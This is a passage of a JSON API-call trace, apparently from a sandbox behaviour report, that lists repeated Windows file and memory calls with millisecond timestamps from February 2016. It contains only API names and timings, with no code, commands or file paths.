"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,601", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,601", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,611", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,611", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,621", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,621", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,631", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,631", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,641", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,641", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,651", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,651", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,661", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,661", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,661", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,671", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,671", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,681", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,681", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:40,691", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,691", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,701", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,701", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,711", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,721", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:40,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,721", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,721", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,731", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,731", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,741", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,741", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,751", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,751", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,751", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,751", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,761", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,761", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:40,771", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,771", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,781", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,781", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,791", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,791", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,801", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,801", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,811", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,811", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:40,811", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,821", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,821", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:40,831", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,831", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,831", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,841", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,841", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,851", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,851", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,861", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,871", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,871", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,881", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,881", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,891", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,891", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,901", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,901", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,911", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,911", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,921", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,921", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,931", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,931", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,941", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,941", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
